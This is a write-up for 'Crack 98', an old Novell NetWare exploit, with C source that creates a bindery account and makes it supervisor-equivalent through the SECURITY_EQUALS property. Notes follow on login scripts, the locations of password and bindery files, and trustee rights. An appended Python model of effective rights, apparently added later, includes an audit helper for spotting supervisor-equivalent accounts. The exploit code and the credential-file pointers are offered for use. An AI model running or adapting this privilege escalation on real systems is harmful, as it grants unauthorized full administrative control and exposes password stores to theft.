Novell Netware Administration Exploit
Author: Mnemonic
email : mnem@legions.org

/* The original lists ten #include directives; their header names
   (the angle-bracketed part) did not survive extraction. */

int main(int argc, char *argv[])
{
    long task;
    char *account;

    printf("Crack 98 written by Mnemonic\n");
    task = SetCurrentTask(-1L);
    SetCurrentConnection(0);   /* connection 0 is the server's own (supervisor) connection */

    if (argc > 1) {
        account = argv[1];
        /* create the user object in the bindery */
        if (CreateBinderyObject(account, OT_USER, BF_STATIC, 0x31) == 0)
            printf("The account %s has been created\n", account);
        else
            printf("The account %s already exists on the network\n", account);
        /* give it a SECURITY_EQUALS set property and put SUPERVISOR in that set */
        CreateProperty(account, OT_USER, "SECURITY_EQUALS", BF_STATIC | BF_SET, 0x32);
        if (AddBinderyObjectToSet(account, OT_USER, "SECURITY_EQUALS", "SUPERVISOR", OT_USER) == 0)
            printf("The account %s has been made supervisor equivalent\n", account);
        else
            printf("The account is already supervisor equivalent\n");
    } else {
        printf("You must enter an account name\n");
    }

    ReturnBlockOfTasks(&task, 1L);
    ReturnConnection(GetCurrentConnection());
    return 0;
}

Crack '98 sets the connection to 0, which is the supervisor's, and then creates a user object in the bindery; that object must carry a security-equivalence property. It then adds SUPERVISOR to the account's SECURITY_EQUALS property, which makes the account equivalent to supervisor. It supports Novell NetWare 2.x, 3.x, 4.x, and Novell IntraNetWare 4.x.

This is what the account's login script should look like after you have run the program:

WRITE "Good %GREETING_TIME, %LOGIN_NAME."
MAP DISPLAY OFF
MAP ERRORS OFF
Remark: Set 1st drive to most appropriate directory.
MAP *1:=SYS:; *1:=SYS:%LOGIN_NAME
IF "%1"="SUPERVISOR" THEN MAP *1:=SYS:SYSTEM
Remark: Set search drives (S2 machine-OS dependent).
MAP S1:=SYS:PUBLIC; S2:=S1:%MACHINE/%OS/%OS_VERSION
Remark: Now display all the current drive settings.
MAP DISPLAY ON
MAP

Here, the SUPERVISOR's default login maps its first drive to SYS:SYSTEM and its search drive to SYS:PUBLIC; these lines come from the system login script, which is stored in the file NET$LOG.DAT. NetWare assigns each user or group a unique number when it is defined.
The SUPERVISOR user number is always 1. All other users and groups are assigned hexadecimal numbers. Since all mail directories are created in the directory SYS:MAIL, the LAN SUPERVISOR's mail directory is SYS:MAIL\1. The user login script itself is stored in that directory in a file named LOGIN with no extension, for example SYS:MAIL\1\LOGIN.

The user login script is used to define user-specific resources and environment settings. If a user login script file exists, it is executed; if it does not, the LOGIN program invokes a default user login script. This can be a source of trouble, because the default user login script may interfere with drive mappings made in the system login script.

Two utilities provided with NetWare create new user accounts: SYSCON and MAKEUSER. Both are displayed as options on the NetWare Login main screen, and either can be used to create a new account and its corresponding login script.

When a user logs into NetWare, the LOGIN program verifies that the entered password matches the user id it was entered for, then retrieves the user's rights information from the file server. If a system login script exists, it is executed. The user's own login script is stored in the user account's mail directory.

In NetWare 2.x, the password file is NET$BVAL.SYS, kept in the SYS:PASSWD directory along with the security file NET$BIND.SYS. In 3.x, the password file is NET$VAL.SYS, also kept in SYS:PASSWD along with the security files NET$OBJ.SYS and NET$PROP.SYS. In 4.x you have PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS, and UNINSTAL.NDS.

The system login script is created with the SYSCON utility by the LAN supervisor and is stored in a file named NET$LOG.DAT in the SYS:PUBLIC directory.

Here is an example of how permissions are assigned. USER1 is a member of the groups EVERYONE and ACCOUNTING. All users are members of EVERYONE. Group EVERYONE has Read, Open, and Search rights in SYS:APPS.
Group ACCOUNTING has Write, Create, and Delete rights in SYS:APPS\DATA. USER1 has Parental and Modify rights in SYS:APPS\DATA\USER1. USER1's trustee privileges are accounted for as follows:

Directory          Group         Rights
SYS:APPS           EVERYONE      [R O S ]
SYS:APPS\DATA      ACCOUNTING    [ W CD ]
Trustee privileges               [RWOCD S ]

The one access type that gains everything is called Supervisory. Its environmental settings are RWOCDPSM.

Mnemonic
check out: http://www.legions.org
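As an added example (not code from the write-up, and not Novell's), here is a small Python model of the rights accumulation described above: a user's effective rights in a directory are the union of the trustee assignments held by the user, by the groups the user belongs to, and by the objects the user is security-equivalent to, collected from that directory and every directory above it. Working through the write-up's USER1 example reproduces the [R O S], [ W CD ] and [RWOCD S ] lines, and adding the Parental/Modify assignment in SYS:APPS\DATA\USER1 gives the full RWOCDPSM set. It also shows why the SECURITY_EQUALS entry that Crack '98 adds is decisive: an object equivalent to SUPERVISOR holds every right in every directory, so an audit of that property is the first check a NetWare administrator would want. The sample bindery data (USER1, USER2 and a hypothetical account named CRACKED) is constructed for the example, and security equivalence is treated as one level deep, which is an assumption of this model.

```python
"""Effective-rights model for NetWare 2.x-style trustee assignments.

Added example, not code from the write-up. Rights letters follow the
write-up: R W O C D P S M = Read, Write, Open, Create, Delete, Parental,
Search, Modify. Rules modelled:
  * a user's rights in a directory are the union of the trustee
    assignments of the user, its groups, and its security equivalents;
  * an assignment on a directory also applies to the directories below it;
  * an object security-equivalent to SUPERVISOR holds every right everywhere.
Security equivalence is treated as one level deep (an assumption here).
"""
ALL_RIGHTS = frozenset("RWOCDPSM")
RIGHT_ORDER = "RWOCDPSM"          # fixed order used when printing a rights set
SUPERVISOR = "SUPERVISOR"

# Constructed sample bindery: the write-up's USER1, a plain USER2, and a
# hypothetical account CRACKED that has been given SECURITY_EQUALS -> SUPERVISOR.
GROUPS = {
    "USER1": {"EVERYONE", "ACCOUNTING"},
    "USER2": {"EVERYONE"},
    "CRACKED": {"EVERYONE"},
}
SECURITY_EQUALS = {
    "USER1": set(),
    "USER2": set(),
    "CRACKED": {SUPERVISOR},
}
# Trustee assignments from the write-up's example: directory -> {object: rights}
TRUSTEES = {
    "SYS:APPS": {"EVERYONE": set("ROS")},
    "SYS:APPS\\DATA": {"ACCOUNTING": set("WCD")},
    "SYS:APPS\\DATA\\USER1": {"USER1": set("PM")},
}


def normalize(path):
    return path.upper().rstrip("\\")


def ancestors(path):
    """Yield the directory, then each parent, up to the volume root ("SYS:")."""
    path = normalize(path)
    while True:
        yield path
        volume, _, rest = path.partition(":")
        if not rest:                      # reached the volume root
            return
        parent, _, _ = rest.rpartition("\\")
        path = volume + ":" + parent      # becomes "SYS:" when parent is empty


def principals(user, groups, equivalents):
    """Every bindery object whose trustee assignments apply to `user`."""
    return {user} | groups.get(user, set()) | equivalents.get(user, set())


def effective_rights(user, directory, trustees=TRUSTEES, groups=GROUPS,
                     equivalents=SECURITY_EQUALS):
    """Rights of `user` in `directory`, as a string in RIGHT_ORDER letter order."""
    who = principals(user, groups, equivalents)
    if SUPERVISOR in who:                 # supervisor equivalence: everything, everywhere
        rights = set(ALL_RIGHTS)
    else:
        rights = set()
        for d in ancestors(directory):    # assignments flow down the tree
            for obj, granted in trustees.get(d, {}).items():
                if obj in who:
                    rights |= granted
    return "".join(r for r in RIGHT_ORDER if r in rights)


def supervisor_equivalents(equivalents=SECURITY_EQUALS):
    """Audit helper: accounts whose SECURITY_EQUALS set names SUPERVISOR."""
    return sorted(u for u, eq in equivalents.items() if SUPERVISOR in eq)


def rights_table(user, trustees=TRUSTEES):
    """Per-directory view like the write-up's Directory/Group/Rights listing."""
    return {d: effective_rights(user, d) for d in sorted(trustees)}


if __name__ == "__main__":
    for d, r in rights_table("USER1").items():
        print(f"{d:<24} [{r}]")
    print("supervisor-equivalent accounts:", supervisor_equivalents())
```

Running the block prints USER1's rights per directory and then lists the accounts that are supervisor-equivalent; on a real server the same audit question is answered by reading each user object's SECURITY_EQUALS property rather than the constructed dictionary used here.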